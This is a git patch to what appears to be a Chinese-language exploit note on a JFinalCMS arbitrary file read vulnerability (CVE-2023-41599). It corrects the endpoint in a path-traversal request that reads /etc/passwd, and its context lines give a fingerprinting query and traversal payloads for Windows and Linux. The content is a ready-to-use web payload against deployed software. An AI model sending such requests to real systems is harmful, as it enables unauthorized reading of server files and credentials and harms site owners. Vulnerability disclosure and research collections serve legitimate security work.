From 3776776d8e22b03c1be964ad6d80833ec68aa1a6 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 20 Sep 2023 17:49:09 +0800 Subject: [PATCH] =?UTF-8?q?Update=20JFinalCMS=20=E4=BB=BB=E6=84=8F?= =?UTF-8?q?=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E(CVE-2023?= =?UTF-8?q?-41599).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md index bd7bcb1..d46ae5b 100644 --- a/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md +++ b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md @@ -14,7 +14,7 @@ web.body="content=\"JreCms" Windows: /../../../../../../../../../test.txt Linux: /../../../../../../../../../etc/passwd -/command/down/file?filekey=/../../../../../../../../../etc/passwd +/common/down/file?filekey=/../../../../../../../../../etc/passwd ```